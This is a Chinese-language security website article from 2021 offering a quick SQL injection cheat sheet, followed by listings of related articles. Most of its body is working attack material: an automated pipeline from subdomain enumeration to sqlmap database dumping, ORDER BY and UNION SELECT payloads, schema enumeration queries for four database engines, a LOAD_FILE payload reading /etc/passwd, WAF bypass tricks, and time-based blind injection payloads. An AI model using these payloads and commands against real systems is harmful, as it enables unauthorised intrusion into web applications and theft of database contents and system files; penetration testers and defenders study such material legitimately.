我要悄悄地注入，然后惊艳所有人！（SQL快速注入漏洞技巧）

时间：2021-08-04 09:32:24 来源：作者：李志宽

1. 使用 Burpsuite：

  1. Capture the request using burpsuite.
  2. Send the request to burp scanner.
  3. Proceed with active scan.
  4. Once the scan is finished, look for SQL vulnerability that has been detected.
  5. Manually try SQL injection payloads.
  6. Use SQLMAP to speed up the process.

2. 使用 waybackurls 和其他工具：

  1. sublist3r -d target | tee -a domains (you can use other tools like findomain, assetfinder, etc.)
  2. cat domains | httpx | tee -a alive
  3. cat alive | waybackurls | tee -a urls
  4. gf sqli urls >> sqli
  5. sqlmap -m sqli --dbs --batch
  6. use tamper scripts

3.使用启发式扫描获取隐藏参数：

  1. Use subdomain enumeration tools on the domain.
  2. Gather all urls using hakcrawler, waybackurls, gau for the domain and subdomains.
  3. You can use the same method described above in 2nd point.
  4. Use Arjun to scan for the hidden params in the urls. 
  5. Use --urls flag to include all urls.
  6. Check the params as https://domain.com?<hiddenparam>=<value>
  7. Send request to file and process it through sqlmap.

4. 使用不受信任的输入或特殊字符生成错误：

  1. Submit single quote character ' & look for errors.
  2. Submit SQL specific query.
  3. Submit Boolean conditions such as or 1=1 and or 1=0, and looking Application's response.
  4. Submit certain payloads that results in time delay.

5.使用 order by 或 group by 或具有以下条件查找总列数：

  Submit a series of ORDER BY clause such as 
    
    ' ORDER BY 1 --
    ' ORDER BY 2 --
    ' ORDER BY 3 --
    
    and incrementing specified column index until an error occurs.

6.使用联合运算符查找易受攻击的列：

  Submit a series of UNION SELECT payloads.
  
    ' UNION SELECT NULL --
    ' UNION SELECT NULL, NULL --
    ' UNION SELECT NULL, NULL, NULL --
    
  (Using NULL maximizes the probability that the payload will succeed. NULL can be converted to every commonly used data type.)

7.使用 concat() 或 group_concat() 提取诸如 database()、version()、user()、UUID() 等基本信息

1. 数据库版本

    Oracle         SELECT banner FROM v$version
                 SELECT version FROM v$instance
    Microsoft         SELECT @@version
    PostgreSQL         SELECT version()
    MySQL         SELECT @@version

2. 数据库内容

    Oracle        SELECT * FROM all_tables
            SELECT * FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE'
    
    Microsoft     SELECT * FROM information_schema.tables
                  SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'
    
    PostgreSQL     SELECT * FROM information_schema.tables
                  SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'

    MySQL         SELECT * FROM information_schema.tables
                  SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'

3. 显示版本、用户和数据库名称

' AND 1=2 UNION ALL SELECT concat_ws(0x3a,version(),user(),database())

4.使用group_concat()函数，用于连接返回结果的所有行。

' union all select 1,2,3,group_concat(table_name),5,6 from information_schema.tables where table_schema=database()–

8. 使用load_file() 访问系统文件。然后提前开发：

' UNION ALL SELECT LOAD_FILE ('/ etc / passwd')

9.绕过WAF：

1. 在 SQL 查询之前使用 Null 字节

    %00' UNION SELECT password FROM Users WHERE username-'xyz'--

2.使用SQL内联注释序列

'/**/UN/**/ION/**/SEL/**/ECT/**/password/**/FR/OM/**/Users/**/WHE/**/RE/**/username/**/LIKE/**/'xyz'--

3.网址编码

    for example :
    / URL encoded to %2f
    * URL encoded to %2a

    Can also use double encoding, if single encoding doesn't works. Use hex encoding if the rest doesn't work.

4. 改变大小写（大写/小写）

5. 使用 SQLMAP 篡改脚本。它有助于绕过 WAF/IDS/IPS。

6. 时间延迟：

      Oracle         dbms_pipe.receive_message(('a'),10)
      
      Microsoft     WAITFOR DELAY '0:0:10'
      
      PostgreSQL     SELECT pg_sleep(10)
      
      MySQL         SELECT sleep(10)

7. 有条件的延误：

      Oracle         SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual
      
      Microsoft     IF (YOUR-CONDITION-HERE) WAITFOR DELAY '0:0:10'
      
      PostgreSQL     SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN pg_sleep(10) ELSE pg_sleep(0) END
      
      MySQL         SELECT IF(YOUR-CONDITION-HERE,sleep(10),'a')

Tags：SQL注入点击:() 评论:()

声明：本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,如有任何标注错误或版权侵犯请与我们联系(Email:2595517585@qq.com)，我们将及时更正、删除，谢谢。

▌相关推荐

一次某大学sql注入到getshell

前言目标是一大学，在一次挖洞过程中遇到个sql注入，尝试进一步利用扩大危害，漏洞已报送平台进行了修复私信我获取网络安全学习资料 1.2000多本网络安全系列电子书 2.网络安全标...【详细内容】

2021-11-26　　Tags: SQL注入点击:(21)　　评论:(0)　　加入收藏

一次简单的SQL注入绕WAF

本人也是小白一枚，大佬请绕过，这个其实是六月份的时候做的，那时候想多点实战经验，就直接用谷歌搜索找了一些网站，这个是其中一个1、目标网站 2、发现有WAF防护 3、判断存在注入...【详细内容】

2021-10-19　　Tags: SQL注入点击:(51)　　评论:(0)　　加入收藏

SQL注入笔记记录+MySQL的事务隔离级别

（一）SQL注入。1.如何理解SQL注入？ SQL注入是一种将SQL代码添加到输入参数中，传递到SQL服务器解析并执行的一种攻击手法。2.SQL注入是如何产生的？ web开发人员无法保证所有的输入...【详细内容】

2021-09-17　　Tags: SQL注入点击:(46)　　评论:(0)　　加入收藏

如何避免出现SQL注入漏洞

一前言本文将针对开发过程中依旧经常出现的SQL编码缺陷，讲解其背后原理及形成原因。并以几个常见漏洞存在形式，提醒技术同学注意相关问题。最后会根据原理，提供解决或缓解方案...【详细内容】

2021-09-17　　Tags: SQL注入点击:(65)　　评论:(0)　　加入收藏

部分sql注入总结

前言本人ctf选手一名，在最近做练习时遇到了一些sql注入的题目，但是sql注入一直是我的弱项之一，所以写一篇总结记录一下最近学到的一些sql注入漏洞的利用。可回显注入联合注入在...【详细内容】

2021-08-26　　Tags: SQL注入点击:(59)　　评论:(0)　　加入收藏

sql注入绕过与sqlmap绕过使用总结

前言最近挖edusrc的时候遇到有注入点但是有waf绕不过，头疼。可以看到还是phpstudy建站的，太熟悉了这个，不知道这个什么waf各位师傅知道的可以评论一下，所以写这篇文章是供各位...【详细内容】

2021-08-13　　Tags: SQL注入点击:(63)　　评论:(0)　　加入收藏

我要悄悄地注入，然后惊艳所有人！（SQL快速注入漏洞技巧）

1. 使用 Burpsuite： 1. Capture the request using burpsuite. 2. Send the request to burp scanner. 3. Proceed with active scan. 4. Once the scan is finished, l...【详细内容】

2021-08-04　　Tags: SQL注入点击:(74)　　评论:(0)　　加入收藏

Mysql注入总结

0×00：前言对于MYSQL知识的一个初总结 0×01：正文 MYSQL数据库特性1.Mysql数据库默认不区分大小写，利用此特性可以进行大小写过正则匹配，举个简单的例子，有的题目中只...【详细内容】

2021-07-29　　Tags: SQL注入点击:(88)　　评论:(0)　　加入收藏

zzzphp save.php save_content方法下sql注入

在本地搭建服务器，httpd-vhosts.conf 中设置本地绑定的域名：其中，zzzphp为下载的zzzphp cms的内容。然后，本机上的zzzphp cms的目录结构为如下：在按照要求安装好cms后，本地cms的...【详细内容】

2021-07-16　　Tags: SQL注入点击:(80)　　评论:(0)　　加入收藏

Mysql注入 -- 联合注入

得到一个像原来老师一样督促你、关心你的人很难。。。---- 网易云热评一、常用命令及函数1、order by排序，获取数据有几个字段，后面小于等于字段数，都会返回结果，大于字段数返回...【详细内容】

2021-05-13　　Tags: SQL注入点击:(223)　　评论:(0)　　加入收藏

▌简易百科推荐

怀疑流氓软件后台偷偷读文件？教你如何实锤

众所周知，Windows系统流氓软件众多，其中不乏出身大厂的产品。这些带有流氓性质的软件，很多都会偷偷扫描系统数据，读取用户文件，造成电脑卡顿拖慢不说，还严重侵害了个人隐私，造成巨...【详细内容】

2021-12-06　　趣玩APPS　　　　Tags:流氓软件　点击:(16)　　评论:(0)　　加入收藏

一次某大学sql注入到getshell

2021-11-26　　IT野涵　　　　Tags:sql注入　点击:(21)　　评论:(0)　　加入收藏

数据库：评估安全风险4个要点

互联网时代，不论是个人还是组织，都将数据视为一项重要的资产。为了便于存储、管理，企业常常会为各项数据建立一个数据库，如果没有做好安全风险防护，一旦数据库被攻占，企业将迎来很...【详细内容】

2021-10-28　　快快网络　　企鹅号　　Tags:数据库　点击:(50)　　评论:(0)　　加入收藏

攻防演练中攻击方是如何打开缺口的方法

前言(可能思路狭隘，有缺有错，师傅们多带带)【查看资料】Author: 0ne本篇文章数据来源于18+省市级别HVV，90+单位失陷报告。(一部分是笔者的参与，一部分是薅的公司其他师傅的报告...【详细内容】

2021-10-28　　IT野涵　　　　Tags:缺口　点击:(46)　　评论:(0)　　加入收藏

一次简单的SQL注入绕WAF

2021-10-19　　　　博客园　　Tags:SQL注入　点击:(51)　　评论:(0)　　加入收藏

如何避免出现SQL注入漏洞

2021-09-17　　woaker　　　　Tags:SQL注入漏洞　点击:(65)　　评论:(0)　　加入收藏

部分sql注入总结

2021-08-26　　合天网安实验室　　　　Tags:sql注入　点击:(59)　　评论:(0)　　加入收藏

IPFS真的这么牛吗？它是如何解决数据安全的问题的？

“放纵自己的欲望是最大的祸害，窥探别人的隐私是最大的罪恶，不知自己的过失是最大的病痛”。上文咱们知道了目前互联网的数据安全存在隐患，数据安全的问题，每天都在发生，只不过...【详细内容】

2021-08-13　　小陶子矿工　　　　Tags:IPFS 　点击:(79)　　评论:(0)　　加入收藏

sql注入绕过与sqlmap绕过使用总结

2021-08-13　　IT影子　　　　Tags:sql注入　点击:(63)　　评论:(0)　　加入收藏

我要悄悄地注入，然后惊艳所有人！（SQL快速注入漏洞技巧）

1. 使用 Burpsuite： 1. Capture the request using burpsuite. 2. Send the request to burp scanner. 3. Proceed with active scan. 4. Once the scan is finished, l...【详细内容】

2021-08-04　　李志宽　　　　Tags:SQL注入　点击:(74)　　评论:(0)　　加入收藏

推荐资讯

远程软件发展迅猛，ToDe	倒计时！企业QQ即将下架
极简Windows11与iPhon	iPhone信号问题，花10元
惊人数据：App Store中4	个人所得税递延纳税报
非常实用的 Python 库	等离子电视技术先进，为